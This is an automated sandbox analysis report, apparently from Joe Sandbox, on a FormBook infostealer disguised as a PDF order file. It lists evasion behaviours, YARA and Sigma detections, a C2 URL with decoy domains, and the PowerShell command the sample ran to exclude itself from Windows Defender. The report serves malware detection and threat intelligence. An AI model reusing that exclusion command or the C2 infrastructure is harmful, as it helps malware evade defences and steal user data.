Edit tour

Windows Analysis Report
ORDER_1105-19-24-3537.pdf.exe

Overview

General Information

Sample name:	ORDER_1105-19-24-3537.pdf.exe
Analysis ID:	1515805
MD5:	a2082543a1c1028dd0a613a6a2af4d21
SHA1:	b6fff58598fad2366a05c18d2d3ccf00f7403391
SHA256:	ee118f8e57acfa0e476638a011ed8d6664d1499e1b326180e21e6f9834ea93e0
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Uses an obfuscated file name to hide its real file extension (double extension)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ORDER_1105-19-24-3537.pdf.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe" MD5: A2082543A1C1028DD0A613A6A2AF4D21)

powershell.exe (PID: 576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2320 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

ORDER_1105-19-24-3537.pdf.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe" MD5: A2082543A1C1028DD0A613A6A2AF4D21)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

rundll32.exe (PID: 1576 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

cmd.exe (PID: 576 cmdline: /c del "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.laske.xyz/rn94/"], "decoy": ["st68v.xyz", "conciergenotary.net", "qwechaotk.top", "rtpdonatoto29.xyz", "8ad.xyz", "powermove.top", "cameras-30514.bond", "vanguardcoffee.shop", "umoe53fxc1bsujv.buzz", "consultoriamax.net", "hplxx.com", "ndu.wtf", "yzh478c.xyz", "bigbrown999.site", "xiake07.asia", "resdai.xyz", "the35678.shop", "ba6rf.rest", "ceo688.com", "phimxhot.xyz", "010101-11122-2222.cloud", "champion-casino-skw.buzz", "laku77.bar", "popumail.net", "stargazerastrology.click", "beauty.university", "t460.top", "sparkyos.app", "day2go.net", "minrungis.shop", "cognigrid.com", "abandoned-houses-39863.bond", "liderparti.store", "hinet.tech", "moviemax.live", "business-printer-22001.bond", "yakintv.pro", "longmaosol.xyz", "hello4d.dev", "vestircool.store", "surpriseinside.net", "betflixfan.asia", "ln2m1.shop", "5302mcavt.website", "conf-contact.online", "31140.ooo", "bdkasinoxox.xyz", "nicoleb.tech", "mainz-cruise-deals.today", "run-run.tokyo", "practicalfranchises.info", "usmanovbanki-uz.space", "superlottery.top", "zabbet911.bet", "ambassadorshipvottings.click", "sangforln.tech", "expertoffersusa.lat", "plong.cloud", "cryptoautomata.dev", "dq33xa.xyz", "handtools-16660.bond", "24763wbk.hair", "sportswear-30530.bond", "lusuidnx.shop"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.4551128208.000000000F01C000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xae2:$a2: pass 0xae8:$a3: email 0xaef:$a4: login 0xaf6:$a5: signin 0xb07:$a6: persistent 0xcda:$r1: C:\Users\user\AppData\Roaming\K0R48ASQ\K0Rlog.ini
00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x63d1:$a1: 3C 30 50 4F 53 54 74 09 40 0x347f1:$a1: 3C 30 50 4F 53 54 74 09 40 0x61c11:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cd30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4b150:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x78570:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xab3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x38f5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x6637f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15a27:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x43e47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x71267:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9a88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9cf2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x37ea8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38112:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x652c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65532:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15825:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x43c45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x71065:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15311:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x43731:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x70b51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15927:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x43d47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x71167:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x43ebf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x712df:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa70a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x38b2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x65f4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x189b9:$sqlite3step: 68 34 1C 7B E1 0x18acc:$sqlite3step: 68 34 1C 7B E1 0x46dd9:$sqlite3step: 68 34 1C 7B E1 0x46eec:$sqlite3step: 68 34 1C 7B E1 0x741f9:$sqlite3step: 68 34 1C 7B E1 0x7430c:$sqlite3step: 68 34 1C 7B E1 0x189e8:$sqlite3text: 68 38 2A 90 C5 0x18b0d:$sqlite3text: 68 38 2A 90 C5 0x46e08:$sqlite3text: 68 38 2A 90 C5 0x46f2d:$sqlite3text: 68 38 2A 90 C5 0x74228:$sqlite3text: 68 38 2A 90 C5 0x7434d:$sqlite3text: 68 38 2A 90 C5 0x189fb:$sqlite3blob: 68 53 D8 7F 8C 0x18b23:$sqlite3blob: 68 53 D8 7F 8C 0x46e1b:$sqlite3blob: 68 53 D8 7F 8C 0x46f43:$sqlite3blob: 68 53 D8 7F 8C 0x7423b:$sqlite3blob: 68 53 D8 7F 8C 0x74363:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6508	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6508	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7aa7a:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6644	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x67c9c:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 1576	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3183b:$a1: 3C 30 50 4F 53 54 74 09 40 0xa5be6:$a1: 3C 30 50 4F 53 54 74 09 40 0x1164a7:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, NewProcessName: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, OriginalFileName: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ProcessId: 6508, ProcessName: ORDER_1105-19-24-3537.pdf.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ParentImage: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, ParentProcessId: 6508, ParentProcessName: ORDER_1105-19-24-3537.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ProcessId: 576, ProcessName: powershell.exe

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1028, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 1576, ProcessName: rundll32.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

